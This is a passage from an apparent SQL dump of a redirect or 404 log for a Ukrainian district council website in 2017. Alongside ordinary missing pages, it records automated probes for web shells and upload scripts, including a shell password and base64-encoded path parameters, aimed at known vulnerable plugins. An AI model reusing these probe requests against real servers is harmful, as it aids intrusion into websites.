00:00:00',301),(29237,'http://malyn-rayrada.gov.ua/images/upa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:47:05','0000-00-00 00:00:00',301),(29238,'http://malyn-rayrada.gov.ua/images/stories/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:47:10','0000-00-00 00:00:00',301),(29239,'http://malyn-rayrada.gov.ua/images/stories/ali.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:47:21','0000-00-00 00:00:00',301),(29240,'http://malyn-rayrada.gov.ua/hh.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:47:22','0000-00-00 00:00:00',301),(29241,'http://malyn-rayrada.gov.ua/images/stories/gh.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:47:25','0000-00-00 00:00:00',301),(29242,'http://malyn-rayrada.gov.ua/tmp/upxx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-01-18 23:47:31','0000-00-00 00:00:00',301),(29243,'http://malyn-rayrada.gov.ua/images/upxx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:47:33','0000-00-00 00:00:00',301),(29244,'http://malyn-rayrada.gov.ua/images/stories/gass.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:47:41','0000-00-00 00:00:00',301),(29245,'http://malyn-rayrada.gov.ua/up14.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:47:49','0000-00-00 00:00:00',301),(29246,'http://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/M2O9cO.php',NULL,'','',1,0,'2017-01-18 23:48:00','0000-00-00 00:00:00',301),(29247,'http://malyn-rayrada.gov.ua/wp-admin/admin-ajax.php',NULL,'http://malyn-rayrada.gov.ua/wp-admin/admin-ajax.php','',32,0,'2017-01-18 23:48:02','0000-00-00 00:00:00',301),(29248,'http://malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/M2O9cO.php',NULL,'','',1,0,'2017-01-18 23:48:15','0000-00-00 00:00:00',301),(29249,'http://malyn-rayrada.gov.ua/wp-content/uploads/M2O9cO.php',NULL,'','',1,0,'2017-01-18 23:48:33','0000-00-00 00:00:00',301),(29250,'http://malyn-rayrada.gov.ua/uploadify/uploadify.php?folder=/',NULL,'http://malyn-rayrada.gov.ua/uploadify/uploadify.php?folder=/','',10,0,'2017-01-18 23:48:37','0000-00-00 00:00:00',301),(29251,'http://malyn-rayrada.gov.ua/M2O9cO.php',NULL,'','',1,0,'2017-01-18 23:48:38','0000-00-00 00:00:00',301),(29252,'http://malyn-rayrada.gov.ua/sites/all/libraries/elfinder/php/connector.minimal.php',NULL,'http://malyn-rayrada.gov.ua/sites/all/libraries/elfinder/php/connector.minimal.php','',4,0,'2017-01-18 23:48:43','0000-00-00 00:00:00',301),(29253,'http://malyn-rayrada.gov.ua/sites/all/libraries/elfinder/files/M2O9cO.php',NULL,'','',1,0,'2017-01-18 23:48:52','0000-00-00 00:00:00',301),(29254,'http://malyn-rayrada.gov.ua/wp-installation.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:48:55','0000-00-00 00:00:00',301),(29255,'http://malyn-rayrada.gov.ua/E.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:49:06','0000-00-00 00:00:00',301),(29256,'http://malyn-rayrada.gov.ua/Jijle3.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:49:15','0000-00-00 00:00:00',301),(29257,'http://malyn-rayrada.gov.ua/xup.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:49:19','0000-00-00 00:00:00',301),(29258,'http://malyn-rayrada.gov.ua/zebda.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:49:24','0000-00-00 00:00:00',301),(29259,'http://malyn-rayrada.gov.ua/kk.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:49:32','0000-00-00 00:00:00',301),(29260,'http://malyn-rayrada.gov.ua/wp_logns.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:49:39','0000-00-00 00:00:00',301),(29261,'http://malyn-rayrada.gov.ua/index.php/1607-pro-sklikannya-14-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',33,0,'2017-01-19 08:21:12','0000-00-00 00:00:00',301),(29262,'http://www.malyn-rayrada.gov.ua/index.php/1612-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-14-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',23,0,'2017-01-19 09:48:19','0000-00-00 00:00:00',301),(29263,'http://www.malyn-rayrada.gov.ua/layouts/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/layouts/logo_img.php','',3,0,'2017-01-19 15:09:09','0000-00-00 00:00:00',301),(29264,'http://www.malyn-rayrada.gov.ua/language/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/language/logo_img.php','',3,0,'2017-01-19 15:14:40','0000-00-00 00:00:00',301),(29265,'http://malyn-rayrada.gov.ua/language/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/language/logo_img.php','',6,0,'2017-01-19 19:03:47','0000-00-00 00:00:00',301),(29266,'http://malyn-rayrada.gov.ua/layouts/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/layouts/logo_img.php','',2,0,'2017-01-19 19:08:18','0000-00-00 00:00:00',301),(29267,'http://www.malyn-rayrada.gov.ua/attachments/article/1577/Підсумки відкритого голосування 11 позачергова сесія7.pdf',NULL,'','',3,0,'2017-01-20 03:49:17','0000-00-00 00:00:00',301),(29268,'http://malyn-rayrada.gov.ua/attachments/article/1583/Підсумки відкритого голосування 12 позачергова сесія7.pdf',NULL,'','',4,0,'2017-01-20 07:22:44','0000-00-00 00:00:00',301),(29269,'http://www.malyn-rayrada.gov.ua/xmlrpc.php',NULL,'','',18,0,'2017-01-20 19:48:00','0000-00-00 00:00:00',301),(29270,'http://www.malyn-rayrada.gov.ua/libraries/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/libraries/logo_img.php','',3,0,'2017-01-21 11:24:13','0000-00-00 00:00:00',301),(29271,'http://malyn-rayrada.gov.ua/index.php/1590-spivchuttya-kolezi?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2017-01-21 12:00:28','0000-00-00 00:00:00',301),(29272,'http://malyn-rayrada.gov.ua/libraries/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/libraries/logo_img.php','',4,0,'2017-01-21 15:25:45','0000-00-00 00:00:00',301),(29273,'http://malyn-rayrada.gov.ua/update.php',NULL,'','',12,0,'2017-01-23 01:10:22','0000-00-00 00:00:00',301),(29274,'http://malyn-rayrada.gov.ua/mobile/',NULL,'','',2,0,'2017-01-23 14:02:01','0000-00-00 00:00:00',301),(29275,'http://malyn-rayrada.gov.ua/index.php/1590-spivchuttya-kolezi',NULL,'','',22,0,'2017-01-26 13:44:24','0000-00-00 00:00:00',301),(29276,'http://malyn-rayrada.gov.ua/attachments/article/1572/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  10 Ñ ÐµÑ Ñ–Ñ 7.pdf',NULL,'','',2,0,'2017-01-30 17:10:56','0000-00-00 00:00:00',301),(29277,'http://malyn-rayrada.gov.ua/attachments/article/1564/Ð†Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ñ–Ñ  прокур.pdf',NULL,'','',2,0,'2017-01-30 17:15:59','0000-00-00 00:00:00',301),(29278,'http://malyn-rayrada.gov.ua/attachments/article/1531/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого поіменного Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  9 Ñ ÐµÑ Ñ–Ñ .pdf',NULL,'','',2,0,'2017-02-03 05:24:53','0000-00-00 00:00:00',301),(29279,'http://malyn-rayrada.gov.ua/attachments/article/1633/Ð¿Ñ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  14-7.pdf',NULL,'','',2,0,'2017-02-04 17:23:26','0000-00-00 00:00:00',301),(29280,'http://www.malyn-rayrada.gov.ua/attachments/article/1614/Ð¿Ñ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ .pdf',NULL,'','',2,0,'2017-02-04 19:34:15','0000-00-00 00:00:00',301),(29281,'http://www.malyn-rayrada.gov.ua/\"http://zakon3.rada.gov.ua/laws/show/2297-17\"',NULL,'','',1,0,'2017-02-05 13:51:08','0000-00-00 00:00:00',301),(29282,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/\"http://uk.wikipedia.org/wiki/Київська_Русь\"',NULL,'','',1,0,'2017-02-05 15:02:12','0000-00-00 00:00:00',301),(29283,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/\"http://uk.wikipedia.org/wiki/17_століття\"',NULL,'','',1,0,'2017-02-05 15:06:59','0000-00-00 00:00:00',301),(29284,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/\"http://uk.wikipedia.org/wiki/1846\"',NULL,'','',1,0,'2017-02-05 18:30:49','0000-00-00 00:00:00',301),(29285,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/\"http://uk.wikipedia.org/wiki/Миклухо-Маклай_Микола_Миколайович\"',NULL,'','',1,0,'2017-02-05 18:48:37','0000-00-00 00:00:00',301),(29286,'http://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/\"http://zakon2.rada.gov.ua/laws/show/595-19\"',NULL,'','',1,0,'2017-02-05 19:08:26','0000-00-00 00:00:00',301),(29287,'http://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/\"http://zakon1.rada.gov.ua/cgi-bin/laws/main.cgi?nreg=393/96-',NULL,'','',1,0,'2017-02-05 19:16:38','0000-00-00 00:00:00',301),(29288,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/\"http://uk.wikipedia.org/wiki/1888\"',NULL,'','',1,0,'2017-02-05 19:19:22','0000-00-00 00:00:00',301),(29289,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/\"http://uk.wikipedia.org/wiki/Мандрівник\"',NULL,'','',1,0,'2017-02-05 19:22:51','0000-00-00 00:00:00',301),(29290,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/\"http://uk.wikipedia.org/wiki/Устинівка_(Малинський_район)\"',NULL,'','',1,0,'2017-02-05 19:26:53','0000-00-00 00:00:00',301),(29291,'http://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/\"http://zakon1.rada.gov.ua/cgi-bin/laws/main.cgi?nreg=93-15&p=1269951823606805\"?nreg=93-15&p=1269951823606805\"',NULL,'','',1,0,'2017-02-05 19:29:37','0000-00-00 00:00:00',301),(29292,'http://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/\"http://zakon.rada.gov.ua/cgi-bin/laws/main.cgi?nreg=2493-14\"?nreg=2493-14\"',NULL,'','',1,0,'2017-02-05 19:48:04','0000-00-00 00:00:00',301),(29293,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/\"http://uk.wikipedia.org/wiki/Магдебурзьке_право\"',NULL,'','',1,0,'2017-02-05 19:49:29','0000-00-00 00:00:00',301),(29294,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/\"http://uk.wikipedia.org/wiki/УПА\"',NULL,'','',1,0,'2017-02-05 22:05:06','0000-00-00 00:00:00',301),(29295,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/\"http://uk.wikipedia.org/wiki/Мал\"',NULL,'','',1,0,'2017-02-05 23:01:49','0000-00-00 00:00:00',301),(29296,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/\"http://uk.wikipedia.org/wiki/9_століття\"',NULL,'','',1,0,'2017-02-05 23:06:36','0000-00-00 00:00:00',301),(29297,'http://www.malyn-rayrada.gov.ua/cachee/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/cachee/logo_img.php','',2,0,'2017-02-06 15:12:56','0000-00-00 00:00:00',301),(29298,'http://malyn-rayrada.gov.ua/cachee/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/cachee/logo_img.php','',2,0,'2017-02-06 19:05:47','0000-00-00 00:00:00',301),(29299,'http://malyn-rayrada.gov.ua/yandex_test123.html',NULL,'','',2,0,'2017-02-07 11:54:06','0000-00-00 00:00:00',301),(29300,'http://www.malyn-rayrada.gov.ua/update.php',NULL,'','',13,0,'2017-02-10 13:58:44','0000-00-00 00:00:00',301),(29301,'http://malyn-rayrada.gov.ua/media/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/media/logo_img.php','',3,0,'2017-02-11 17:30:20','0000-00-00 00:00:00',301),(29302,'http://malyn-rayrada.gov.ua/index.php/1663-nekrolog',NULL,'','',36,0,'2017-02-12 16:02:56','0000-00-00 00:00:00',301),(29303,'http://www.malyn-rayrada.gov.ua/docs/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/docs/logo_img.php','',1,0,'2017-02-14 16:06:25','0000-00-00 00:00:00',301),(29304,'http://malyn-rayrada.gov.ua/attachments/article/1638/Поіменне Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  14.pdf',NULL,'','',2,0,'2017-02-14 19:07:18','0000-00-00 00:00:00',301),(29305,'http://malyn-rayrada.gov.ua/docs/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/docs/logo_img.php','',1,0,'2017-02-14 20:39:41','0000-00-00 00:00:00',301),(29306,'http://www.malyn-rayrada.gov.ua/css.php',NULL,'http://www.malyn-rayrada.gov.ua/css.php','',7,0,'2017-02-15 15:45:41','0000-00-00 00:00:00',301),(29307,'http://www.malyn-rayrada.gov.ua/wso.php',NULL,'http://www.malyn-rayrada.gov.ua/wso.php','',2,0,'2017-02-15 15:45:42','0000-00-00 00:00:00',301),(29308,'http://malyn-rayrada.gov.ua/wso.php',NULL,'http://malyn-rayrada.gov.ua/wso.php','',6,0,'2017-02-15 19:28:34','0000-00-00 00:00:00',301),(29309,'http://malyn-rayrada.gov.ua/css.php',NULL,'http://malyn-rayrada.gov.ua/css.php','',6,0,'2017-02-15 19:28:35','0000-00-00 00:00:00',301),(29310,'http://malyn-rayrada.gov.ua/site/',NULL,'','',4,0,'2017-02-16 19:57:31','0000-00-00 00:00:00',301),(29311,'http://www.malyn-rayrada.gov.ua//sinoptik.ua/informers_js.php?title=3&wind=1&cities=303015024&lang=ua',NULL,'','',11,0,'2017-02-20 18:06:26','0000-00-00 00:00:00',301),(29312,'http://www.malyn-rayrada.gov.ua/templates/rada0804/===n?(t.parentNode&&(t.outerHTML=e.outerHTML),b.support.html5Clone&&e.innerHTML&&!b.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):',NULL,'','',1,0,'2017-02-20 18:11:25','0000-00-00 00:00:00',301),(29313,'http://www.malyn-rayrada.gov.ua/templates/rada1/===n?(t.parentNode&&(t.outerHTML=e.outerHTML),b.support.html5Clone&&e.innerHTML&&!b.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):',NULL,'','',1,0,'2017-02-20 18:11:26','0000-00-00 00:00:00',301),(29314,'http://www.malyn-rayrada.gov.ua//about:blank',NULL,'','',1,0,'2017-02-20 18:11:29','0000-00-00 00:00:00',301),(29315,'http://www.malyn-rayrada.gov.ua/media/jui/js/)[this.options.html',NULL,'','',1,0,'2017-02-20 18:11:33','0000-00-00 00:00:00',301),(29316,'http://www.malyn-rayrada.gov.ua/https://ua.sinoptik.ua/?????????',NULL,'','',1,0,'2017-02-20 18:11:50','0000-00-00 00:00:00',301),(29317,'http://www.malyn-rayrada.gov.ua/https://ua.sinoptik.ua/?????????',NULL,'','',1,0,'2017-02-20 18:11:51','0000-00-00 00:00:00',301),(29318,'http://www.malyn-rayrada.gov.ua/https://ua.sinoptik.ua/?????????',NULL,'','',1,0,'2017-02-20 18:11:53','0000-00-00 00:00:00',301),(29319,'http://malyn-rayrada.gov.ua/attachments/article/1614/Ð¿Ñ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ .pdf',NULL,'','',2,0,'2017-02-21 07:11:52','0000-00-00 00:00:00',301),(29320,'http://www.malyn-rayrada.gov.ua/logs/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/logs/logo_img.php','',2,0,'2017-02-21 14:21:32','0000-00-00 00:00:00',301),(29321,'http://www.malyn-rayrada.gov.ua/log.php',NULL,'http://www.malyn-rayrada.gov.ua/log.php','',13,0,'2017-02-23 16:18:15','0000-00-00 00:00:00',301),(29322,'http://www.malyn-rayrada.gov.ua/index.php/1663-nekrolog',NULL,'','',29,0,'2017-02-23 17:27:40','0000-00-00 00:00:00',301),(29323,'http://malyn-rayrada.gov.ua/log.php',NULL,'http://malyn-rayrada.gov.ua/log.php','',9,0,'2017-02-23 20:18:40','0000-00-00 00:00:00',301),(29324,'http://www.malyn-rayrada.gov.ua/news.php',NULL,'http://www.malyn-rayrada.gov.ua/news.php','',13,0,'2017-02-24 19:59:19','0000-00-00 00:00:00',301),(29325,'http://malyn-rayrada.gov.ua/news.php',NULL,'http://malyn-rayrada.gov.ua/news.php','',8,0,'2017-02-25 07:13:14','0000-00-00 00:00:00',301),(29326,'http://www.malyn-rayrada.gov.ua/adri23.php',NULL,'http://www.malyn-rayrada.gov.ua/adri23.php','',1,0,'2017-02-25 10:49:49','0000-00-00 00:00:00',301),(29327,'http://malyn-rayrada.gov.ua/adri23.php',NULL,'http://malyn-rayrada.gov.ua/adri23.php','',1,0,'2017-02-25 13:37:28','0000-00-00 00:00:00',301),(29328,'http://www.malyn-rayrada.gov.ua/images/1ndex.php?z3=Wm5JaFpaLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:01:22','0000-00-00 00:00:00',301),(29329,'http://www.malyn-rayrada.gov.ua/sqlbak.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:01:29','0000-00-00 00:00:00',301),(29330,'http://www.malyn-rayrada.gov.ua/email.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:01:37','0000-00-00 00:00:00',301),(29331,'http://www.malyn-rayrada.gov.ua/functions.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:02:01','0000-00-00 00:00:00',301),(29332,'http://www.malyn-rayrada.gov.ua/cache/news.php?z3=Wm5JaFpaLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:02:23','0000-00-00 00:00:00',301),(29333,'http://www.malyn-rayrada.gov.ua/tmp.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',4,0,'2017-02-25 18:02:35','0000-00-00 00:00:00',301),(29334,'http://www.malyn-rayrada.gov.ua/shootme.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:02:56','0000-00-00 00:00:00',301),(29335,'http://www.malyn-rayrada.gov.ua/robots.txt.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:03:31','0000-00-00 00:00:00',301),(29336,'http://www.malyn-rayrada.gov.ua/jconfig.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:03:43','0000-00-00 00:00:00',301),(29337,'http://www.malyn-rayrada.gov.ua/media/reads.php?z3=Wm5JaFpaLnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:04:01','0000-00-00 00:00:00',301),(29338,'http://www.malyn-rayrada.gov.ua/media/1ndex.php?z3=Wm5JaFpaLnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:04:13','0000-00-00 00:00:00',301),(29339,'http://www.malyn-rayrada.gov.ua/sql_dump.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:04:28','0000-00-00 00:00:00',301),(29340,'http://www.malyn-rayrada.gov.ua/images/laj.php?z3=Wm5JaFpaLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:04:49','0000-00-00 00:00:00',301),(29341,'http://www.malyn-rayrada.gov.ua/media/404.php?z3=Wm5JaFpaLnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:05:20','0000-00-00 00:00:00',301),(29342,'http://www.malyn-rayrada.gov.ua/media/tmp.php?z3=Wm5JaFpaLnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:05:28','0000-00-00 00:00:00',301),(29343,'http://www.malyn-rayrada.gov.ua/r3x.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:05:56','0000-00-00 00:00:00',301),(29344,'http://www.malyn-rayrada.gov.ua/images/stories/0day.php?z3=Wm5JaFpaLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:06:37','0000-00-00 00:00:00',301),(29345,'http://www.malyn-rayrada.gov.ua/includes/u2p.php?z3=Wm5JaFpaLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:06:51','0000-00-00 00:00:00',301),(29346,'http://www.malyn-rayrada.gov.ua/images/xxx.php?z3=Wm5JaFpaLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:07:09','0000-00-00 00:00:00',301),(29347,'http://www.malyn-rayrada.gov.ua/al277.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:07:27','0000-00-00 00:00:00',301),(29348,'http://www.malyn-rayrada.gov.ua/cache/cache_aqbmkwwx.php?z3=Wm5JaFpaLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:07:49','0000-00-00 00:00:00',301),(29349,'http://www.malyn-rayrada.gov.ua/install.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:08:16','0000-00-00 00:00:00',301),(29350,'http://www.malyn-rayrada.gov.ua/dswat.org/wsdl.php?z3=Wm5JaFpaLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:08:25','0000-00-00 00:00:00',301),(29351,'http://www.malyn-rayrada.gov.ua/robot.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:08:34','0000-00-00 00:00:00',301),(29352,'http://www.malyn-rayrada.gov.ua/wsdl.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:08:57','0000-00-00 00:00:00',301),(29353,'http://www.malyn-rayrada.gov.ua/site/tmp/cTivrC.php?z3=Wm5JaFpaLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:09:27','0000-00-00 00:00:00',301),(29354,'http://www.malyn-rayrada.gov.ua/wp-main.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:09:59','0000-00-00 00:00:00',301),(29355,'http://www.malyn-rayrada.gov.ua/images/al277.php?z3=Wm5JaFpaLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:10:29','0000-00-00 00:00:00',301),(29356,'http://www.malyn-rayrada.gov.ua/webconfig.txt.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:10:41','0000-00-00 00:00:00',301),(29357,'http://www.malyn-rayrada.gov.ua/_input_3_up.php',NULL,'http://www.malyn-rayrada.gov.ua/_input_3_up.php','',1,0,'2017-02-25 18:10:55','0000-00-00 00:00:00',301),(29358,'http://www.malyn-rayrada.gov.ua/thumb.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:11:31','0000-00-00 00:00:00',301),(29359,'http://www.malyn-rayrada.gov.ua/SessionController.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:12:10','0000-00-00 00:00:00',301),(29360,'http://www.malyn-rayrada.gov.ua/maill.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:12:34','0000-00-00 00:00:00',301),(29361,'http://www.malyn-rayrada.gov.ua/error-log.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:12:59','0000-00-00 00:00:00',301),(29362,'http://www.malyn-rayrada.gov.ua/authenticating.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:13:23','0000-00-00 00:00:00',301),(29363,'http://www.malyn-rayrada.gov.ua/images/google-assist.php?z3=Wm5JaFpaLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:14:05','0000-00-00 00:00:00',301),(29364,'http://www.malyn-rayrada.gov.ua/images/robots.txt.php?z3=Wm5JaFpaLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:14:19','0000-00-00 00:00:00',301),(29365,'http://www.malyn-rayrada.gov.ua/elements.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:14:29','0000-00-00 00:00:00',301),(29366,'http://www.malyn-rayrada.gov.ua/xmlsrpc.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:14:41','0000-00-00 00:00:00',301),(29367,'http://www.malyn-rayrada.gov.ua/wp-cache.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:15:00','0000-00-00 00:00:00',301),(29368,'http://www.malyn-rayrada.gov.ua/images/404.php?z3=Wm5JaFpaLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:15:21','0000-00-00 00:00:00',301),(29369,'http://www.malyn-rayrada.gov.ua/images/head.php?z3=Wm5JaFpaLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:15:31','0000-00-00 